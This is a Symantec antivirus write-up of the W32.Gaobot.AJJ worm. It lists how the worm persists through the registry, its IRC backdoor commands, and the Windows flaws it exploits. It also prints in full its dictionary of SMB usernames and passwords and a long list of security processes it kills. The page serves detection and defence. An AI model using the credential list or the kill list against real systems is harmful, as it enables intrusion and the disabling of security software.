Symantec.com > Security Response > Threats and Risks > W32.Gaobot.AJJ

Bookmark & Share

W32.Gaobot.AJJ

Risk Level 2: Low

Printer Friendly Page

Discovered: May 11, 2004

Updated: February 13, 2007 12:23:00 PM

Type: Worm

Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP

When W32.Gaobot.AJJ runs it performs the following actions:

Copies itself as LSMAS.exe to the %System% directory. This file name may vary.

Note: %System% is a variable. The W32.Gaobot.AJJ locates the System folder and copies itself to that location. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

2. Adds the file as a value to the registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

so that the worm runs on startup.

3. Adds the following lines to %System%\drivers\etc\hosts so that any attempts to connect to these Web sites fail:

4. Attempts to terminate the processes of a large number of antivirus and security applications. See Processes for a complete list.

5. Attempts to delete files and registry key entries associated with other worms and end the following processes:

6. Opens a randomly selected TCP port and sends a copy of itself to any process connecting to that port.

7. Connects to a remote IRC server and awaits commands from the remote attacker.
This allows the attacker to perform the following actions on the infected system:

Run commands
Retrieve files through FTP and HTTP
Retrieve data from the registry
Restart the computer
List the processes
Kill a particular process
Terminate Windows services
Perform HTTP, ICMP, SYN, and UDP floods
Retrieve the email addresses stored on the computer
Retrieve a list of email addresses through HTTP
Retrieve a given URL
Sniff HTTP, FTP, and IRC traffic
Steal the Windows product ID and the CD keys of various video games

8. Attempts to spread to other systems by:

Sending itself to the back door port that the Beagle family of worms open.
Sending itself to the back door port that the Mydoom family of worms open.
Exploiting the Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (BID 8205).
Exploiting the Microsoft Windows Workstation Service Remote Buffer Overflow Vulnerability (BID 9011).
Exploiting the Microsoft Windows WebDAV Buffer Overflow Vulnerability (BID 7116).
Exploiting the Microsoft UPnP NOTIFY Buffer Overflow Vulnerability (BID 3723).
Exploiting the Microsoft SQL Server Web Task Stored Procedure Privilege Escalation Vulnerability (BID 5980).
Exploiting the Microsoft Windows Local Security Authority Service Remote Buffer Overflow (BID 10108).

9. Attempts to copy itself to other computers through the following remote administrative SMB shares:

admin$
print$
ipc$
e$
d$
c$
c

Usernames:

"Administrator" "Administrateur" "Coordinatore" "Administrador" "Verwalter" "Ospite" "kanri" "kanri-sha" "admin" "administrator" "Default" "Convidado" "mgmt" "Standard" "User" "administrador" "Owner" "user" "server" "Test" "Guest" "Gast" "Inviter" "a" "aaa" "abc" "x" "xyz" "Dell" "home" "pc" "test" "temp" "win" "asdf" "qwer" "OEM" "root" "wwwadmin" "login" "owner" "mary" "mike" "george" "jim" "tim" "tom" "stacy" "stacey" "colin" "mark" "erik" "peter" "patrick" "bill" "steve" "dick" "stefan" "steven" "kate" "kt" "karl" "mypc" "admins" "computer" "xp" "OWNER" "mysql" "sql" "database" "teacher" "student"

Passwords:

"admin" "Admin" "password" "Password" "12" "123" "1234" "beer" "!@#$" "asdfgh" "!@#$%" "!@#$%^" "!@#$%^&" "!@#$%^&*" "WindowsXP" "windows2k" "windowsME" "windows98" "windoze" "hax" "dude" "owned" "lol" "ADMINISTRATOR" "rooted" "noob" "TEMP" "share" "r00t" "freak" "ROOT" "TEST" "SYSTEM" "LOCAL" "SERVER" "ACCESS" "BACKUP" "computer" "fucked" "gay" "idiot" "Internet" "test" "2003" "2004" "backdoor" "whore" "wh0re" "CNN" "pwned" "own" "crash" "passwd" "PASSWD" "iraq" "devil" "linux" "UNIX" "feds" "fish" "changeme" "ASP" "PHP" "666" "BOX" "Box" "box" "12345" "123456" "1234567" "12345678" "123456789" "654321" "54321" "111" "000000" "00000000" "11111111" "88888888" "fanny" "pass" "passwd" "database" "abcd" "oracle" "sybase" "123qwe" "fool" "server" "computer" "Internet" "super" "123asd" "ihavenopass" "West" "godblessyou" "enable" "xp" "23" "2002" "2600" "0" "110" "2525" "newfy" "111111" "121212" "123123" "1234qwer" "123abc" "007" "alpha" "1776" "newfie" "patrick" "pat" "administrator" "root" "sex" "god" "foobar" "1778" "a" "aaa" "abc" "test" "temp" "win" "pc" "asdf" "secret" "drugs" "qwer" "yxcv" "zxcv" "home" "xxx" "owner" "login" "Login" "west" "Coordinatore" "Administrador" "Verwalter" "Ospite" "administrator" "Default" "administrador" "admins" "teacher" "student" "superman" "wmd" "supersecret" "kids" "penis" "wwwadmin" "database" "changeme" "dope" "test123" "user" "private" "69" "root" "654321" "xxyyzz" "asdfghjkl" "mybaby" "vagina" "pussy" "leet" "metal" "work" "school" "mybox" "box" "werty" "baby" "porn" "homework" "secrets" "x" "z" "bong" "qwertyuiop" "secret" "Administrateur" "abc123" "password123" "red123" "qwerty" "admin123" "zxcvbnm" "poiuytrewq" "pwd" "pass" "love" "mypc" "texas" "Texas" "Washington" "washington" "Tennessee" "tennessee" "jackdaniels" "whisky" "whiskey" "azerty" "poiut" "mouse" "ordinateur" "souris" "imprimeur" "cederom" "cTdTrom" "biFre" "biere" "moonshine" "athlon" "oil" "opteron" "Tcran" "ecran" "reseau" "carte" "merde" "mince" "ami" "amie" "copin" "copine" "42" "harry" "dumbledore" "hagrid" "potter" "hermione" "hermine" "gryffindor" "azkaban" "askaban" "cauldron" "buckbeak" "hogwarts" "dementor" "quidditch" "madre" "switch" "mypass" "pw"

10. Copies itself and executes on any remote shares to which it successfully authenticates.

11. Schedules a Network job to run the worm on the remote system.

Processes

W32.Gaobot.AJJ attempts to end the following processes, as mentioned in Step 4:

F-AGOBOT.EXE HIJACKTHIS.EXE _AVPM.EXE _AVPCC.EXE _AVP32.EXE ZONEALARM.EXE ZONALM2601.EXE ZATUTOR.EXE ZAPSETUP3001.EXE ZAPRO.EXE XPF202EN.EXE WYVERNWORKSFIREWALL.EXE WUPDT.EXE WUPDATER.EXE WSBGATE.EXE WRCTRL.EXE WRADMIN.EXE WNT.EXE WNAD.EXE WKUFIND.EXE WINUPDATE.EXE WINTSK32.EXE WINSTART001.EXE WINSTART.EXE WINSSK32.EXE WINSERVN.EXE WINRECON.EXE WINPPR32.EXE WINNET.EXE WINMAIN.EXE WINLOGIN.EXE WININITX.EXE WININIT.EXE WININETD.EXE WINDOWS.EXE WINDOW.EXE WINACTIVE.EXE WIN32US.EXE WIN32.EXE WIN-BUGSFIX.EXE WIMMUN32.EXE WHOSWATCHINGME.EXE WGFE95.EXE WFINDV32.EXE WEBTRAP.EXE WEBSCANX.EXE WEBDAV.EXE WATCHDOG.EXE W9X.EXE W32DSM89.EXE VSWINPERSE.EXE VSWINNTSE.EXE VSWIN9XE.EXE VSSTAT.EXE VSMON.EXE VSMAIN.EXE VSISETUP.EXE VSHWIN32.EXE VSECOMR.EXE VSCHED.EXE VSCENU6.02D30.EXE VSCAN40.EXE VPTRAY.EXE VPFW30S.EXE VPC42.EXE VPC32.EXE VNPC3000.EXE VNLAN300.EXE VIRUSMDPERSONALFIREWALL.EXE VIR-HELP.EXE VFSETUP.EXE VETTRAY.EXE VET95.EXE VET32.EXE VCSETUP.EXE VBWINNTW.EXE VBWIN9X.EXE VBUST.EXE VBCONS.EXE VBCMSERV.EXE UTPOST.EXE UPGRAD.EXE UPDAT.EXE UNDOBOOT.EXE TVTMD.EXE TVMD.EXE TSADBOT.EXE TROJANTRAP3.EXE TRJSETUP.EXE TRJSCAN.EXE TRICKLER.EXE TRACERT.EXE TITANINXP.EXE TITANIN.EXE TGBOB.EXE TFAK5.EXE TFAK.EXE TEEKIDS.EXE TDS2-NT.EXE TDS2-98.EXE TDS-3.EXE TCM.EXE TCA.EXE TC.EXE TBSCAN.EXE TAUMON.EXE TASKMON.EXE TASKMO.EXE TASKMG.EXE SYSUPD.EXE SYSTEM32.EXE SYSTEM.EXE SYSEDIT.EXE SYMTRAY.EXE SYMPROXYSVC.EXE SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE SWEEP95.EXE SVSHOST.EXE SVCHOSTS.EXE SVCHOSTC.EXE SVC.EXE SUPPORTER5.EXE SUPPORT.EXE SUPFTRL.EXE STCLOADER.EXE START.EXE ST2.EXE SSG_4104.EXE SSGRATE.EXE SS3EDIT.EXE SRNG.EXE SREXE.EXE SPYXX.EXE SPOOLSV32.EXE SPOOLCV.EXE SPOLER.EXE SPHINX.EXE SPF.EXE SPERM.EXE SOFI.EXE SOAP.EXE SMSS32.EXE SMS.EXE SMC.EXE SHOWBEHIND.EXE SHN.EXE UPDATE.EXE SHELLSPYINSTALL.EXE SH.EXE SGSSFW32.EXE SFC.EXE SETUP_FLOWPROTECTOR_US.EXE SETUPVAMEEVAL.EXE SERVLCES.EXE SERVLCE.EXE SERVICE.EXE SERV95.EXE SD.EXE SCVHOST.EXE SCRSVR.EXE SCRSCAN.EXE SCANPM.EXE SCAN95.EXE SCAN32.EXE SCAM32.EXE SC.EXE SBSERV.EXE SAVENOW.EXE SAVE.EXE SAHAGENT.EXE SAFEWEB.EXE RUXDLL32.EXE RUNDLL16.EXE RUNDLL.EXE RUN32DLL.EXE RULAUNCH.EXE RTVSCN95.EXE RTVSCAN.EXE RSHELL.EXE RRGUARD.EXE RESCUE32.EXE RESCUE.EXE REGEDT32.EXE REGEDIT.EXE REGED.EXE REALMON.EXE RCSYNC.EXE RB32.EXE RAY.EXE RAV8WIN32ENG.EXE RAV7WIN.EXE RAV7.EXE RAPAPP.EXE QSERVER.EXE QCONSOLE.EXE PVIEW95.EXE PUSSY.EXE PURGE.EXE PSPF.EXE PROTECTX.EXE PROPORT.EXE PROGRAMAUDITOR.EXE PROCEXPLORERV1.0.EXE PROCESSMONITOR.EXE PROCDUMP.EXE PRMVR.EXE PRMT.EXE PRIZESURFER.EXE PPVSTOP.EXE PPTBC.EXE PPINUPDT.EXE POWERSCAN.EXE PORTMONITOR.EXE PORTDETECTIVE.EXE POPSCAN.EXE POPROXY.EXE POP3TRAP.EXE PLATIN.EXE PINGSCAN.EXE PGMONITR.EXE PFWADMIN.EXE PF2.EXE PERSWF.EXE PERSFW.EXE PERISCOPE.EXE PENIS.EXE PDSETUP.EXE PCSCAN.EXE PCIP10117_0.EXE PCFWALLICON.EXE PCDSETUP.EXE PCCWIN98.EXE PCCWIN97.EXE PCCNTMON.EXE PCCIOMON.EXE PCC2K_76_1436.EXE PCC2002S902.EXE PAVW.EXE PAVSCHED.EXE PAVPROXY.EXE PAVCL.EXE PATCH.EXE PANIXK.EXE PADMIN.EXE OUTPOSTPROINSTALL.EXE OUTPOSTINSTALL.EXE OTFIX.EXE OSTRONET.EXE OPTIMIZE.EXE ONSRVR.EXE OLLYDBG.EXE NWTOOL16.EXE NWSERVICE.EXE NWINST4.EXE NVSVC32.EXE NVC95.EXE NVARCH16.EXE NUI.EXE NTXconfig.EXE NTVDM.EXE NTRTSCAN.EXE NT.EXE NSUPDATE.EXE NSTASK32.EXE NSSYS32.EXE NSCHED32.EXE NPSSVC.EXE NPSCHECK.EXE NPROTECT.EXE NPFMESSENGER.EXE NPF40_TW_98_NT_ME_2K.EXE NOTSTART.EXE NORTON_INTERNET_SECU_3.0_407.EXE NORMIST.EXE NOD32.EXE NMAIN.EXE NISUM.EXE NISSERV.EXE NETUTILS.EXE NETSTAT.EXE NETSPYHUNTER-1.2.EXE NETSCANPRO.EXE NETMON.EXE NETINFO.EXE NETD32.EXE NETARMOR.EXE NEOWATCHLOG.EXE NEOMONITOR.EXE NDD32.EXE NCINST4.EXE NC2000.EXE NAVWNT.EXE NAVW32.EXE NAVSTUB.EXE NAVNT.EXE NAVLU32.EXE NAVENGNAVEX15.NAVLU32.EXE NAVDX.EXE NAVAPW32.EXE NAVAPSVC.EXE NAVAP.NAVAPSVC.EXE AUTO-PROTECT.NAV80TRY.EXE NAV.EXE OUTPOST.EXE NUPGRADE.EXE N32SCANW.EXE MWATCH.EXE MU0311AD.EXE MSVXD.EXE MSSYS.EXE MSSMMC32.EXE MSMSGRI32.EXE MSMGT.EXE MSLAUGH.EXE MSINFO32.EXE MSIEXEC16.EXE MSDOS.EXE MSDM.EXE MSCONFIG.EXE MSCMAN.EXE MSCCN32.EXE MSCACHE.EXE MSBLAST.EXE MSBB.EXE MSAPP.EXE MRFLUX.EXE MPFTRAY.EXE MPFSERVICE.EXE MPFAGENT.EXE MOSTAT.EXE MOOLIVE.EXE MONITOR.EXE MMOD.EXE MINILOG.EXE MGUI.EXE MGHTML.EXE MGAVRTE.EXE MGAVRTCL.EXE MFWENG3.02D30.EXE MFW2EN.EXE MFIN32.EXE MD.EXE MCVSSHLD.EXE MCVSRTE.EXE MCTOOL.EXE MCSHIELD.EXE MCMNHDLR.EXE MCAGENT.EXE MAPISVC32.EXE LUSPT.EXE LUINIT.EXE LUCOMSERVER.EXE LUAU.EXE LSETUP.EXE LORDPE.EXE LOOKOUT.EXE LOCKDOWN2000.EXE LOCKDOWN.EXE LOCALNET.EXE LOADER.EXE LNETINFO.EXE LDSCAN.EXE LDPROMENU.EXE LDPRO.EXE LDNETMON.EXE LAUNCHER.EXE KILLPROCESSSETUP161.EXE KERNEL32.EXE KERIO-WRP-421-EN-WIN.EXE KERIO-WRL-421-EN-WIN.EXE KERIO-PF-213-EN-WIN.EXE KEENVALUE.EXE KAZZA.EXE KAVPF.EXE KAVPERS40ENG.EXE KAVLITE40ENG.EXE JEDI.EXE JDBGMRG.EXE JAMMER.EXE ISTSVC.EXE MCUPDATE.EXE LUALL.EXE ISRV95.EXE ISASS.EXE IRIS.EXE IPARMOR.EXE IOMON98.EXE INTREN.EXE INTDEL.EXE INIT.EXE INFWIN.EXE INFUS.EXE INETLNFO.EXE IFW2000.EXE IFACE.EXE IEXPLORER.EXE IEDRIVER.EXE IEDLL.EXE IDLE.EXE

ICSUPPNT.EXE ICMON.EXE ICLOADNT.EXE ICLOAD95.EXE IBMAVSP.EXE IBMASN.EXE IAMSTATS.EXE IAMSERV.EXE IAMAPP.EXE HXIUL.EXE HXDL.EXE HWPE.EXE HTPATCH.EXE HTLOG.EXE HOTPATCH.EXE HOTACTIO.EXE HBSRV.EXE HBINST.EXE HACKTRACERSETUP.EXE GUARDDOG.EXE GUARD.EXE GMT.EXE GENERICS.EXE GBPOLL.EXE GBMENU.EXE GATOR.EXE FSMB32.EXE FSMA32.EXE FSM32.EXE FSGK32.EXE FSAV95.EXE FSAV530WTBYB.EXE FSAV530STBYB.EXE FSAV32.EXE FSAV.EXE FSAA.EXE FRW.EXE FPROT.EXE FP-WIN_TRIAL.EXE FP-WIN.EXE FNRB32.EXE FLOWPROTECTOR.EXE FIREWALL.EXE FINDVIRU.EXE FIH32.EXE FCH32.EXE FAST.EXE FAMEH32.EXE F-STOPW.EXE F-PROT95.EXE F-PROT.EXE F-AGNT95.EXE EXPLORE.EXE EXPERT.EXE EXE.AVXW.EXE EXANTIVIRUS-CNET.EXE EVPN.EXE ETRUSTCIPE.EXE ETHEREAL.EXE ESPWATCH.EXE ESCANV95.EXE ICSUPP95.EXE ESCANHNT.EXE ESCANH95.EXE ESAFE.EXE ENT.EXE EMSW.EXE EFPEADM.EXE ECENGINE.EXE DVP95_0.EXE DVP95.EXE DSSAGENT.EXE DRWEBUPW.EXE DRWEB32.EXE DRWATSON.EXE DPPS2.EXE DPFSETUP.EXE DPF.EXE DOORS.EXE DLLREG.EXE DLLCACHE.EXE DIVX.EXE DEPUTY.EXE DEFWATCH.EXE DEFSCANGUI.EXE DEFALERT.EXE DCOMX.EXE DATEMANAGER.EXE Claw95.EXE CWNTDWMO.EXE CWNB181.EXE CV.EXE CTRL.EXE CPFNT206.EXE CPF9X206.EXE CPD.EXE CONNECTIONMONITOR.EXE CMON016.EXE CMGRDIAN.EXE CMESYS.EXE CMD32.EXE CLICK.EXE CLEANPC.EXE CLEANER3.EXE CLEANER.EXE CLEAN.EXE CFINET32.EXE CFINET.EXE CFIADMIN.EXE CFGWIZ.EXE CFD.EXE CDP.EXE CCPXYSVC.EXE CCEVTMGR.EXE CCAPP.EXE BVT.EXE BUNDLE.EXE BS120.EXE BRASIL.EXE BPC.EXE BORG2.EXE BOOTWARN.EXE BOOTCONF.EXE BLSS.EXE BLACKICE.EXE BLACKD.EXE BISP.EXE BIPCPEVALSETUP.EXE BIPCP.EXE BIDSERVER.EXE BIDEF.EXE BELT.EXE BEAGLE.EXE BD_PROFESSIONAL.EXE BARGAINS.EXE BACKWEB.EXE CLAW95CF.EXE CFIAUDIT.EXE AVXMONITORNT.EXE AVXMONITOR9X.EXE AVWUPSRV.EXE AVWUPD.EXE AVWINNT.EXE AVWIN95.EXE AVSYNMGR.EXE AVSCHED32.EXE AVPTC32.EXE AVPM.EXE AVPDOS32.EXE AVPCC.EXE AVP32.EXE AVP.EXE AVNT.EXE AVLTMAIN.EXE AVKWCTl9.EXE AVKSERVICE.EXE AVKSERV.EXE AVKPOP.EXE AVGW.EXE AVGUARD.EXE AVGSERV9.EXE AVGSERV.EXE AVGNT.EXE AVGCTRL.EXE AVGCC32.EXE AVE32.EXE AVCONSOL.EXE AU.EXE ATWATCH.EXE ATRO55EN.EXE ATGUARD.EXE ATCON.EXE ARR.EXE APVXDWIN.EXE APLICA32.EXE APIMONITOR.EXE ANTS.EXE ANTIVIRUS.EXE ANTI-TROJAN.EXE AMON9X.EXE ALOGSERV.EXE ALEVIR.EXE ALERTSVC.EXE AGENTW.EXE AGENTSVR.EXE ADVXDWIN.EXE ADAWARE.EXE AVXQUAR.EXE ACKWIN32.EXE AVWUPD32.EXE AVPUPD.EXE AUTOUPDATE.EXE AUTOTRACE.EXE AUTODOWN.EXE AUPDATE.EXE ATUPDATER.EXE TASKMON.EXE

Recommendations

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
For further information on the terms used in this document, please refer to the Security Response glossary.

Writeup By: Ying Lin

Removal

Summary

Search Threats

Search by name

_{Example: W32.Beagle.AG@mm}